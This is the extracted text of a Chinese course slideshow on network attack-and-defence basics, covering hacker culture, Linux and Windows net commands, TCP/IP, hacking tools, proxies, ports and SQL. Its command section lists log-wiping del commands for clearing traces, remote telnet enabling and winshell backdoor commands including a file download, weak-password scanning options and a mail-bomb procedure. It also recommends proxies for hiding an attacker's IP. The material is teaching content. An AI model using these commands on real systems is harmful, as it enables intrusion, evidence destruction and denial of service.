《网络攻防基础知识.ppt》由会员分享,可在线阅读,更多相关《网络攻防基础知识.ppt(81页珍藏版)》请在三一办公上搜索。
1、第2章 网络攻防基础知识,黑客基础知识Linux/Unix基础TCP/IP协议基础攻击基础,内容简介,本章简要介绍了与网络攻防基础知识相关的基础知识内容包括:什么是黑客,什么是骇客,黑客和骇客的区别,什么是黑客的精神。黑客攻击的一般目标,Linux下基本命令的功能和用法,TCP/IP协议,黑客攻击常用的网络命令、工具,SQL语句,介绍了HTTP代理、Telnet代理和SOCKS5代理以及端口的基本常识。,2.1.黑客基础知识,何谓“黑客”一名初级黑客所必须掌握的基本技能黑客攻击的目标,2.1.1.何谓“黑客”,黑客(hacker),源于英语动词hack,意为“劈,砍”,引申为“干了一件非常漂亮
2、的工作”。“喜欢探索软件程序奥秘,并从中增长了其个人才干的人。他们不象绝大多数电脑使用者那样,只规规矩矩地了解别人指定了解的狭小部分知识”。那些专门利用电脑搞破坏或恶作剧的家伙,英文正确叫法是Cracker,有人翻译成“骇客”。黑客和骇客根本的区别是:黑客们建设,而骇客们破坏。,2.1.1.何谓“黑客”(续),黑客精神指的就是善于独立思考、喜欢自由探索的一种思维方式。“精神的最高境界是自由”。独立:独立思考自由:自由探索免费:认为软件都应该是免费的共享:认为人类创造的文明成果都应该免费共享,不受束缚,2.1.1.何谓“黑客”(续),四代黑客铸就了网络:第一代黑客:20世纪60至70年代,一群大
3、学计算机系教室里的知识分子利用“分时系统”技术把计算机主机变成了事实上的个人计算机,从而使更多的人有机会接触到计算机;第二代黑:70年代后期,大名鼎鼎的史蒂夫、乔布斯、史蒂夫、伍兹尼亚克和费尔森斯坦,发明并产生了个人计算机;第三代黑客:80年代初,为个人计算机设计了各种应用教育和娱乐程序。特别是米彻凯普发明的LOTUS1 1-2-3电子报表程序促成了IBM PC的成功。第四代黑客:80年代中期,发明了包罗万象的电子公告牌(BBS)和自由平等的以非层级方式连接的USENET,并且将美国国防部的阿帕网(ARPANET)改造成了今天的互联网络。,2.1.2.一名初级黑客所必须掌握的基本技能,1了解一
4、定量的英文。2学会基本软件的使用。3初步了解网络协议和工作原理。4熟悉几种流行的编程语言和脚本。5熟悉网络应用程序。6了解计算机体系结构。7了解密码算法和安全协议。,2.1.3.黑客攻击的目标,1终端用户资源 2网络资源 3服务器资源 4信息存储资源,2.2.Linux/Unix基础,Linux/Unix系统简介Linux系统基本命令,系统简介,Unix操作系统是由肯汤普逊(KenThompson)在贝尔实验室于1969年开发成功的。它是一个分时多用户、多任务的通用操作系统。Unix是命令驱动的,Unix系统对计算机硬件的要求比较高,对于一般的个人来说,想要在PC机上运行Unix是比较困难的。
5、Linux是在1990年,芬兰赫尔辛基大学的一名学生莱那斯托瓦茨(Linus Torvalds)开发的。在Linux0.02版本中已经可以运行bash(Shell的一种)和gcc(GNUC编译器)。Linux和WindowsNT比起来技术上存在很多优势。最主要体现在三个方面:一是Linux更安全,二是Linux更稳定,三是Linux的硬件资源占用要比WindowsNT少得多。,2.2.2.Linux系统基本命令,1.启动 Linux的启动操作过程和DOS相似(尽管如此,但作为操作系统本身,Linux在启动和退出时所作的工作要比DOS快得多),也可以通过按下CtrlAltDel键进行热启动。不同
6、的是Linux启动到最后时需要进行登录。下面是一个典型的登录过程:RedHat Linux release 5.1 Kernel 2.0.32 on an i686 login:输入root后,按Enter键,计算机提示输入口令(password),则应输入相应的用户的口令(如果是第一次启动,则是在安装时所输入的口令)即可。当计算机出现一个提示符时,表明登录成功!rootlocalhost root_ Linux提示符 C:_ DOS提示符,2.2.2.Linux系统基本命令(续),2.显示文件目录命令ls(DOS下为DIR)在Linux中用ls命令显示文件及目录(当然,仍然也可用DIR命令,
7、只不过在这里的参数不同)。例如:rootlocalhost root#ls root mnt boot dev bin usr xiong tmp etc games,2.2.2.Linux系统基本命令(续),3.改变当前目录命令cd(DOS下为CD)在DOS中,可以用C:CDMNTcdrom或cdmntcdrom C:mntcdromcd.或cd.或CD.C:mntcd或C:mntcd 在Linux中为cd mntcdrom,目录名的大小写必须与实际相同,cd后必须有空格。pwd 显示当前目录 cd.必须为小写,必须有空格 cd 总目录为,cd与/必须有空格,2.2.2.Linux系统基本命
8、令(续),4.建立子目录mkdir(DOS下为MD或MKDIR)在Linux中只能用mkdir,例如:DOS系统:C:md xiong(相对路径)或md xiong或mdxiong(绝对路径)Linux系统:rootlocalhost root#mkdir xiong(相对路径)或mkdir xiong(绝对路径),2.2.2.Linux系统基本命令(续),5.删除子目录命令rmdir(DOS下为RD)在Linux中用rmdir命令删除子目录,例如:rootlocalhost root#rmdir mntcdrom 相当于rd mntcdrom 注意:同DOS一样,要删除的子目录必须是空的,而
9、且必须在上一级目录中才能删除下一级子目录。,2.2.2.Linux系统基本命令(续),6.删除文件命令RM(DOS下为DEL或EARSE)在Linux中用RM命令删除文件,例:rootlocalhost root#rmucdos.bat 相当于del ucdos.bat,2.2.2.Linux系统基本命令(续),7.文件改名命令mv(DOS下为REN或RENAME)在Linux中用mv命令给文件改名,例:rootlocalhost root#mvmntfloppy p相当于 ren mntfloppy p 提示:在Linux中的mv命令除了文件改名外,还有移动文件的功能,请看例子:rootlo
10、calhost root#mv mntfloppy bin 相当于DOS中的命令move mntfloppy bin。,2.2.2.Linux系统基本命令(续),8.文件复制命令cp(DOS下为Copy)在Linux中用cp命令进行文件复制,例:rootlocalhost root#cp ucdos*fox 相当于DOS命令copy ucdos*.*fox 注意:DOS中的*.*在Linux中用*代替。,2.2.2.Linux系统基本命令(续),9.获取帮助信息命令man(DOS下为Help)在Linux中用man命令获取帮助信息,例:rootlocalhost root#man ls,2.2
11、.2.Linux系统基本命令(续),10.显示文件的内容less(DOS下为Type)在Linux中用less命令进行文件显示工作,例如,要显示man1子目录下的mwm.lx的内容,只需输入:rootlocalhost man1less mwm.lx在Linux中,也可用另外一个命令more来显示文件内容,例如:rootlocalhost man1#more mwm.lx会看到这两个命令非常相似,实际上less命令的功能要比more强一些。在Linux中,还提供了两个DOS中没有的阅读文件的命令,它们是head和tail命令,分别用来显示文件的头部和后部的部分内容。使用格式为:head(tai
12、l)m默认为n时,显示10行,例如:headusrmanmwm.lx显示文件mwm.lx前10行的内容 head 15usrmanmwm.lx 显示文件mwm.lx前15行的内容 tail 17usrmanmwm.lx 显示文件mwm.lx后17行的内容,2.2.2.Linux系统基本命令(续),11.重定向与管道 在DOS中,可以通过重定向与管道方便地进行一些特殊的操作,如:c:dirdirfile.txt解释说明:将当前目录放入文件dirfile.txt中。c:type readmedirfile.txt解释说明:将文件readme的内容追加到文件dirfile中。c:type readm
13、e.txt|more解释说明:分页显示文本文件readme.txt的内容。在Linux中的重定向与管道操作同DOS中的操作几乎一样,上面的两个例子在Linux中应为:rootlocalhost root#lsdirect;less readme.txt|more说明:实际上Linux中的more和less命令本身具有分页功能。,2.2.2.Linux系统基本命令(续),12.外壳程序(shell):命令解释器(command)在DOS系统中,绝大多数用户都是用的这个命令解释器。当然,也可换用Norton或DOS4.0以后的dosshell。在Linux中,有好几种shell。常见的有ash、b
14、ash、ksh、tcsh、zsh等,Linux安装时一般默认的是bash。以上讲到的仅仅是与DOS功能相似的一些Linux命令,而作为一个多用户、多任务的操作系统,其强大的功能还远不止于此,更多的功能需要读者自己去深入研究。,协议,ISO参考模型TCP/IP整体构架概述TCP/IP中的协议,参考模型,OSI参考模型(OSI/RM)的全称是开放系统互连参考模型(Open System Interconnection Reference Model,OSI/RM),它是由国际标准化组织(International Standard Organization,ISO)提出的一个网络系统互连模型。,整
15、体构架概述,TCP协议最早由斯坦福大学的两名研究人员于1973年提出。1983年,TCP/IP被Unix 4.2BSD系统采用。TCP/IP协议其实是一个协议集合,它包括了TCP协议(Transport Control Protocol,传输控制协议)、IP协议(Internet Protocol,Internet协议)及其他一些协议。TCP协议用于在应用程序之间传送数据,IP协议用于在主机之间传送数据。,OSI参考模型和TCP/IP参考模型对比,2.3.3.TCP/IP中的协议,1.IP 网络层负责相邻计算机之间的通信,而网际协议IP是TCP/IP的心脏,也是网络层中最重要的协议。IP数据报
16、的格式如图所示,2.3.3.TCP/IP中的协议(续),1.IP地址格式,2.3.3.TCP/IP中的协议(续),2.TCP TCP/IP协议(Transfer Control Protocol/Internet Protocol)叫做传输控制/网际协议,又叫网络通讯协议。虽然从名字上看TCP/IP包括两个协议,传输控制协议(TCP)和网际协议(IP),但TCP/IP实际上是一组协议,它包括上百个各种功能的协议,如:远程登录、文件传输和电子邮件等,而TCP协议和IP协议是保证数据完整传输的两个基本的重要协议。,2.3.3.TCP/IP中的协议(续),3.UDP UDP与TCP位于同一层,但对于
17、数据包的顺序错误或重发不做控制。因此,UDP不被应用于那些使用虚电路的面向连接的服务,UDP主要用于那些面向查询-应答的服务,例如NFS。相对于FTP或Telnet,这些服务需要交换的信息量较小。使用UDP的服务包括NTP(网落时间协议)和DNS(DNS也使用TCP)。欺骗UDP包比欺骗TCP包更容易,因为UDP没有建立初始化连接(也可以称为握手)(因为在两个系统间没有虚电路),也就是说,与UDP相关的服务面临着更大的危险。,2.3.3.TCP/IP中的协议(续),4.ICMP ICMP与IP位于同一层,它被用来传送IP的的控制信息。它主要是用来提供有关通向目的地址的路径信息。ICMP的Red
18、irect信息通知主机通向其他系统的更准确的路径,而Unreachable信息则指出路径有问题。另外,如果路径不可用了,ICMP可以使TCP连接终止。Ping是最常用的基于ICMP的服务。,2.3.3.TCP/IP中的协议(续),5.TCP和UDP的端口结构 TCP和UDP服务通常有一个客户/服务器的关系,例如,一个Telnet服务进程开始在系统上处于空闲状态,等待着连接。用户使用Telnet客户程序与服务进程建立一个连接。客户程序向服务进程写入信息,服务进程读出信息并发出响应,客户程序读出响应并向用户报告。因而,这个连接是双工的,可以用来进行读写。端口是一个软件结构,被客户程序或服务进程用来
19、发送和接收信息。一个端口对应一个16比特的数。服务进程通常使用一个固定的端口,例如,SMTP使用25端口等。在建立与特定的主机或服务的连接时,需要这些地址和目的地址进行通讯。,2.4.攻击基础,网络命令黑客攻击常用的工具代理服务器的工作机制 端口功能说明 SQL语句,2.4.1.网络命令,1、Ping Ping命令可以测试计算机名和计算机的IP地址,验证与远程计算机的连接,通过向计算机发送ICMP(Internet Control and Message Protocal,因特网控制消息/错误报文协议)回应数据包并且回应数据包的返回时间,以校验与远程计算机或本地计算机的连接情况。Ping命令的
20、使用格式如下:Ping-t-a-n count-l length-f-i ttl-v tos-r count-s count-j computer-list|-k computer-list-w timeout destination-list,2.4.1.网络命令(续),2、Tracert tracert命令主要用于显示连接情况,其使用格式如下:tracert-d-h maximum_hops-j computer-list-w timeout target_name如果不使用参数,将显示连接情况。-d:指定不将地址解析为计算机名。-h maximum_hops:指定搜索目标的最大跃点数。-
21、j computer-list:指定沿computer-list的稀疏源路由。-w timeout:每次应答等待timeout指定的微秒数。,2.4.1.网络命令(续),3、Nbtstat nbstat命令主要用于查看当前基于NETBIOS的TCP/IP连接状态,通过该工具你可以获得远程或本地机器的组名和机器名。Nbstat命令的语法格式如下:nbtstat-a RemoteName-A IP address-c-n-r-R-RR-s-S interval,2.4.1.网络命令(续),4、Netstat 主要功能:显示协议统计和当前的 TCP/IP 网络连接。该命令只有在安装了 TCP/IP
22、协议后才可以使用。该命令可以使用户了解到自己的主机是怎样与网络相连接的。Netstat命令的语法格式如下:netstat-a-e-n-s-p protocol-r interval,2.4.1.网络命令(续),5、Net Net命令是一种基于网络上的命令,并且是一个命令行命令。Net命令可以管理网络环境、服务、用户、登录等本地及远程信息,但是在Windows 9x下Net命令没有像在Windows NT下那么强大,没有扩展性。以下以Windows NT下的Net命令为例。Net use:将计算机与共享资源连接或断开,或者显示关于计算机连接的信息。该命令还控制持久网络连接。net use dev
23、icename|*computernamesharenamevolume password|*/user:domainnameusername/delete|/persistent:yes|nonet use devicename/homepassword|*/delete:yes|nonet use/persistent:yes|no,2.4.1.网络命令(续),5、Net Net user 命令的原理与作用Net user命令是添加或修改用户账户或者显示用户账户信息。net user命令及参数使用net user username password|*options/domainnet u
24、ser username password|*/add options/domainnet user username/delete/domain,2.4.1.网络命令(续),5、Net Net localgroup 命令的原理与作用添加、显示或修改本地组。命令的参数及使用:net localgroup groupname/comment:text/domain net localgroup groupname/add/comment:text|/delete/domainnet localgroup groupname name./add|/delete/domain,2.4.1.网络命令(
25、续),5、Net Net view 命令的原理与作用显示域列表、计算机列表或者由指定计算机共享的资源。命令的参数及使用net view computername|/domain:domainnamenet view/network:nw computername,2.4.1.网络命令(续),5、Net Net share 命令的原理与作用创建、删除或显示共享资源。命令的参数及使用net share sharename net share sharename=drive:path/users:number|/unlimited/remark:text net share sharename/us
26、ers:number|unlimited/remark:text net share sharename|drive:path/delete,2.4.1.网络命令(续),5、Net Net stop 命令的原理与作用停止 Windows 2000 网络服务。,2.4.1.网络命令(续),5、Net Net start 命令的原理与作用启动服务,或显示已启动服务的列表。Net start命令具体应用如果要查看本地计算机所开启的服务,在命令提示符下输入命令net start。提示:如果要启动一项服务,可以在命令提示符下输入net start 及相关服务名称,例如要启动Windows 2000的se
27、rver服务,在命令提示符下输入net start server,2.4.1.网络命令(续),5、Net Net time命令 命令的原理与作用使计算机的时钟与另一个计算机或域的时钟同步。如果在没有/set 选项的情况下使用,则显示另一个计算机或域的时间。命令的参数及使用net time computername|/domain:domainname|/rtsdomain:domainname/set net time computername/querysntp|/setsntp:ntp server list没有参数显示被指派为本地计算机的 Windows 服务器域的时间服务器的计算机的当
28、前时间。computername指定要检查或与之同步的服务器的名称。,2.4.1.网络命令(续),6、At命令及用法 1.命令的原理与作用列出指定的时间和日期在计算机上运行的已计划命令或计划命令和程序。必须正在运行计划服务才能使用 at 命令。2.命令的参数及使用at computername id/delete|/delete/yesat computername time/interactive/every:date,.|/next:date,.command,2.4.1.网络命令(续),7、Ftp命令的使用 1.命令的原理与作用Ftp命令是Internet用户使用最频繁的命令之一,不论是
29、在DOS还是UNIX操作系统下使用Ftp都会遇到大量的Ftp内部命令。掌握并灵活应用Ftp的内部命令,可以大大方便使用者,并收到事半功倍之效。2.运行 Ftp命令 Windows 9x中使用:单击【开始】【程序】【MS-DOS命令】命令 Windows 2000 中使用:单击【开始】【程序】【附件】【命令提示符】命令 单击【开始】【运行】命令,在【运行】对话框中输入FTP命令及相关参数即可。3.命令的参数Ftp-v-n-i-d-g-s:filename-a-w:windowsize computer,2.4.1.网络命令(续),8、其它常用命令 1下面是一组清除痕迹的命令del C:winnt
30、system32logfiles*.*del C:winntssytem32config*.evt del C:winntsystem32dtclog*.*del C:winntsystem32*.log del C:winntsystem32*.txt del C:winnt*.txt del C:winnt*.log,2.4.1.网络命令(续),8、其它常用命令 2下面是用netsvc.exe命令分别列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:netsvc/list IP地址 netsvc schedule IP地址/query netsvc IP地址 schedule/s
31、tart,2.4.1.网络命令(续),8、其它常用命令 3下面是用OpenTelnet.exe远程启动主机的Telnet服务,并绑定端口到7878,例如:OpenTelnet IP地址 用户名 密码 1 7878 然后就可以telnet到主机的7878端口,进入DOS方式下:telnet IP地址 7878 利用winshell.exe,telnet到主机的7878端口,输入密码winshell,当看到CMD后,可打下面的命令:p Path(查看winshell主程序的路径信息)b reBoot(重新启动机器)d shutDown(关闭机器)s Shell(执行后你就会看到可爱的“C:”)x
32、eXit(退出本次登录会话,此命令并不终止winshell的运行)CMD http:/./srv.exe(通过http下载其他网站上的文件到运行winshell的机器上),2.4.1.网络命令(续),8、其它常用命令 4利用Xscan攻击。Xscan命令行运行参数说明如下:在检测过程中,按空格键可以查看各线程状态及扫描进度,按q键保存当前数据后提前退出程序,按强行关闭程序。命令格式:xscan-host-其他选项 xscan-file 其他选项 其中 含义如下:-port:检测常用服务的端口状态(可通过datconfig.ini文件的ORT-SCAN-OPTIONSPORT-LIST项定制待检
33、测端口列表);-Ftp:检测FTP弱口令(可通过datconfig.ini文件设置用户名/密码字典文件);-ntpass:检测NT-Server弱口令(可通过datconfig.ini文件设置用户名/密码字典文件);-cgi:检测CGI漏洞(可通过datconfig.ini文件的CGI-ENCODEencode_type项设置编码方案);-iis:检测IIS漏洞(可通过datconfig.ini文件的CGI-ENCODEencode_type项设置编码方案);其他选项 含义如下:-v:显示详细扫描进度-p:跳过Ping不通的主机-o:跳过没有检测到开放端口的主机-t:指定最大并发线程数量和并发
34、主机数量,默认数量为100,10,2.4.2.黑客攻击常用的工具,所谓黑客工具是指编写出来用于网络安全方面的工具软件,其功能是执行一些诸如扫描端口,防止黑客程序入侵,监测系统等功能,有些是用来防御,而有些则是以恶意攻击为目的攻击性软件,常见的有木马程序,病毒程序,炸弹程序等,另外还有一部分软件是为了破解某些软件或系统的密码而编写的。可以通过这些工具了解黑客的攻击手段,掌握防范黑客攻击的方法,堵住可能出现的各种漏洞。,2.4.2.黑客攻击常用的工具(续),1、木马程序 一般的木马都有客户端和服务器端两个执行程序,其中客户端是用于黑客远程控制植入木马的机器的程序,服务器端程序即是木马程序。如果黑客
35、要通过木马入侵你的系统,他所要做的第一步就是要让木马的服务器端程序在你的计算机中运行。一旦运行成功,木马程序就可以获得系统管理员的权限,在用户毫不觉察的情况下,对计算机做任何能做的事情。所以,计算机用户应该经常检查自己的系统,作好木马的预防和清除工作。,2.4.2.黑客攻击常用的工具(续),1、木马程序 1冰河:冰河可以自动跟踪目标机器的屏幕变化;可以完全模拟键盘及鼠标输入;可以记录各种口令信息,包括开机口令、屏保口令、各种共享资源口令以及绝大多数在对话框中出现过的口令信息;可以获取系统信息,包括计算机名、注册公司、当前用户、系统路径、操作系统版本、当前显示分辨率、物理及逻辑磁盘信息等多项系统
36、数据;它还可以限制系统功能、进行远程文件操作及注册表操作,同时它还具有发送信息和点对点通讯的能力。,冰河的服务器端和客户端,2.4.2.黑客攻击常用的工具(续),1、木马程序 2蓝色火焰蓝色火焰是一款有实力、有新意的木马,它放弃了作为远程监控工具的客户端程序,直接利用现有网络相关的程序来控制服务器端。这一特色使蓝色火焰这个“没有客户端的木马”逐渐成为了许多黑客必备的工具之一。,2.4.2.黑客攻击常用的工具(续),1、木马程序 3灰鸽子灰鸽子是一个功能强大的远程控制类软件,它与同类木马软件不同的是采用了“反弹端口原理”的连接方式,可以在互联网上访问到局域网内通过透明代理上网的电脑,并且可以穿过
37、某些防火墙。灰鸽子分为客户端与服务端,软件在下载安装后没有服务端,只有客户端H_Clien.exe,服务器端是要通过配置来生成的。,2.4.2.黑客攻击常用的工具(续),1、木马程序 现在的木马层出不穷,数不胜数,比较出名的还有诸如BO2K、广外女生、网络神偷、黑洞2001、无赖小子等等,令人防不胜防。对木马的防御和清除工作,一般来说,要作到以下三点:一、不轻易运行来历不明的软件;二、及时升级杀毒软件,使病毒库保持最新;三、安装并运行防火墙。,2.4.2.黑客攻击常用的工具,2、扫描工具 扫描工具是一种能够自动检测远程或本地主机安全弱点的程序,通过它可以获得远程计算机的各种端口分配及提供的服务
38、和它们的版本。扫描器工作时是通过选用不同的TCP/IP端口的服务,并记录目标主机给予的应答,以此搜集到关于目标主机的各种有用信息的。对于扫描器,我们不能将它等同于一个攻击网络漏洞的程序。它只是提供了目标主机的信息,而不是直接进攻,它获取的信息必须经过人为的分析才能成为真正有用的信息。当然,这需要用户具有一定的网络知识,否则,扫描器对于用户来说,将毫无用处。,2.4.2.黑客攻击常用的工具(续),2、扫描工具 下面就比较有名的扫描器做出介绍。1流光流光是国内最著名的扫描、入侵工具,集端口扫描、字典工具、入侵工具、口令猜解等多种功能于一身,界面豪华,功能强大!运行界面如图2-46所示。它能让一个刚
39、刚会用鼠标的人成为专业级黑客。它可以探测POP3、FTP、SMTP、IMAP、SQL、IPC、IIS、FINGER等各种漏洞,并针对各种漏洞设计了不同的破解方案,能够在有漏洞的系统上轻易得到被探测的用户密码。流光对Windows9x/NT/2000上的漏洞都可以探测,使它成为了黑客手中必备的工具之一。,2.4.2.黑客攻击常用的工具(续),2、扫描工具 下面就比较有名的扫描器做出介绍。1流光,流光运行界面,2.4.2.黑客攻击常用的工具(续),2、扫描工具 2SuperscanSuperscan是一个功能强大的端口扫描工具。它可以通过Ping来检验目标计算机是否在线,支持IP和域名相互转换,还
40、可以检验一定范围内目标计算机的端口情况和提供的服务类别。Superscan可以自定义要检验的端口,并可以保存为端口列表文件,它还自带了一个木马端口列表,通过这个列表可以检测目标计算机是否有木马,同时用户也可以自己定义、修改这个木马端口列表。在Superscan找到的主机上,单击右键可以实现HTTP浏览、TELNET登陆、FTP上传、域名查询等功能。,2.4.2.黑客攻击常用的工具(续),2Superscan运行界面,2.4.2.黑客攻击常用的工具(续),2、扫描工具3X-way2.5X-way2.5是一个主要采用多线程形式对服务器系统进行漏洞扫描和安全测试的工具。同流光一样,它最大的特点也是高
41、集成度,除了拥有类似于流光中的IIS远程命令及SQL远程命令外,还拥有流光目前不具备的一些功能,在这一点上,X-way2.5与流光相比,毫不逊色。X-way2.5可以对系统进行综合扫描,包括对端口及系统CGI漏洞的扫描。X-way2.5还可以对NT主机进行IPC探测,列举主机用户、共享资源及工作组,获取WEB服务信息,进行SMTP的用户验证及漏洞检测、FTP匿名登录检测、Finger探测、RPC探测、弱口令检测,并可代理扫描。,2.4.2.黑客攻击常用的工具(续),3X-way2.5运行界面,2.4.2.黑客攻击常用的工具(续),3、破解工具 根据破解原理的不同,破解工具大致可分为穷举法破解器
42、和查看法破解器两种。穷举法,又叫暴力破解法,其过程是从黑客字典里抽出一个字段来和要破解的密码进行对比,直到破解出密码或字典里的字段全部试完为止。这种守株待兔的方法看似简单,但由于黑客字典通常包含了很多黑客经验的累积,所以此法就对于安全意识不强的用户,破解率是很高的。查看法是指程序通过嗅探或系统漏洞来获得密码文件的方法。,2.4.2.黑客攻击常用的工具(续),3、破解工具1溯雪溯雪是小榕作品的代表之一,它可以利用ASP、CGI对免费信箱进行密码探测,其运行原理是,通过提取ASP、CGI页面表单,搜寻表单运行后的错误标志,有了错误标志后,再挂上字典文件来破解信箱密码。溯雪运行界面如图所示,2.4.
43、2.黑客攻击常用的工具(续),3、破解工具2网络刺客II网络刺客是天行软件的经典之作,软件的最大作用就是,当有人在局域网中使用的POP3、FTP、Telnet服务时,网络刺客II就可以截获其中的密码。程序的II代同I代相比,无论在功能、性能、技术上都有了长足的进步,I代只相当于II代的一个微小子集。,2.4.2.黑客攻击常用的工具(续),3、破解工具3黑雨黑雨是一款非常优秀的POP3邮箱密码暴力破解器。它可以验证用户名和密码是否正确,并独创了深度和广度两种破解算法。深度算法是一种很特殊的算法,如果密码位数猜得准,就可以将破解时间缩短30%-70%。广度算法是一种老实的算法,现大多数类似功能的工
44、具都采用它,其对3位以下的短小密码非常有效。总的来看,黑雨软件的特色为独创了多项算法,简单、易用且功能强大。,2.4.2.黑客攻击常用的工具(续),3、破解工具4.MD5CrackMD5Crack是一个MD5的暴力破解器,支持多线程自定义破解。目前最新的版本是MD5Crack4.0。其运行界面如图所示。,2.4.2.黑客攻击常用的工具(续),4、炸弹工具 炸弹攻击的基本原理是利用特殊工具软件,在短时间内向目标机集中发送大量超出系统接收范围的信息或者垃圾信息,目的在于使对方目标机出现超负荷、网络堵塞等状况,从而造成目标的系统崩溃及拒绝服务。常见的炸弹有邮件炸弹、逻辑炸弹、聊天室炸弹等。例如邮件炸
45、弹工具QuickFyre,只要在各个输入框中填入目标邮箱地址、发信人的邮箱地址(一般可假冒他人)、邮件的主题、邮件服务器地址和邮件复制的份数,然后在主界面下方的信件内容框中输入信件内容,单击“Mail”按钮,程序连接邮件服务器后,就开始发信进行攻击了。目前对于邮件炸弹还没有解决的万全之策,只能消极防御,以预防为主。要做到尽量不轻易给别人留下自己的E-mail地址,同时申请容量较大的信箱,并开启邮件过滤功能。,2.4.3.代理服务器的工作机制,代理服务器英文全称是Proxy Server,其功能就是代理网络用户去取得网络信息。形象的说:它是网络信息的中转站。代理服务器简单的来说就是借助一台计算机
46、作为跳板,再到另一个计算机上去,这样就隐藏了本机的真实IP地址,一个有经验的入侵者在攻击一个网站之前,首要是保护自己,借助代理服务器来攻击计算机,这样在被攻击的计算机日志上只会留下代理服务器的IP地址,从而隐藏了自己。另一方面,代理还有一个好处,在有些站点访问不到的情况下也可以借助代理服务器,比如在以前用169拨号上网只能访问国内的站点,而不能访问国外的站点,此时借助代理服务器就可以实现对国外站点的访问。,2.4.3.代理服务器的工作机制(续),1、Http代理,HTTP代理设置,2.4.3.代理服务器的工作机制(续),2、Telnet代理,wGateScan 3.0界面,2.4.3.代理服务
47、器的工作机制(续),3、Socks5代理,【Snake的socks代理】软件界面,2.4.4.端口功能说明,按端口号可分为3大类:1公认端口(Well Known Ports):从0到1023,它们紧密绑定(binding)于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。2注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。3动态和/或私有端口(Dynamic and/or Private Por
48、ts):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。,2.4.4.端口功能说明(续),常见端口对照表:21:FTP23:Telnet25:SMTP80:HTTP113:Authentication Service161:SNMP1080:SOCKS1433:SQL8080:代理端口,2.4.5.SQL语句,数据库是入侵的重点目标之一,读者至少应该了解有关数据库SQL语句的以下几个方面的内容。在此仅列出了标题,如果需要仔细的学习,请参考相关的教材。数据操作语句SELECT-从数据库表中检索数据
49、行和列INSERT-向数据库表添加新数据行DELETE-从数据库表中删除数据行UPDATE-更新数据库表中的数据,2.4.5.SQL语句(续),数据定义语句CREATE TABLE-创建一个数据库表DROP TABLE-从数据库中删除表ALTER TABLE-修改数据库表结构CREATE VIEW-创建一个视图DROP VIEW-从数据库中删除视图CREATE INDEX-为数据库表创建一个索引DROP INDEX-从数据库中删除索引CREATE PROCEDURE-创建一个存储过程DROP PROCEDURE-从数据库中删除存储过程CREATE TRIGGER-创建一个触发器DROP TRI
50、GGER-从数据库中删除触发器CREATE SCHEMA-向数据库添加一个新模式DROP SCHEMA-从数据库中删除一个模式CREATE DOMAIN-创建一个数据值域ALTER DOMAIN-改变域定义DROP DOMAIN-从数据库中删除一个域,2.4.5.SQL语句(续),数据控制语句GRANT-授予用户访问权限DENY-拒绝用户访问REVOKE-解除用户访问权限,2.4.5.SQL语句(续),事务控制语句COMMIT-结束当前事务ROLLBACK-中止当前事务SET TRANSACTION-定义当前事务数据访问特征,2.4.5.SQL语句(续),程序化SQL语句DECLARE-为查询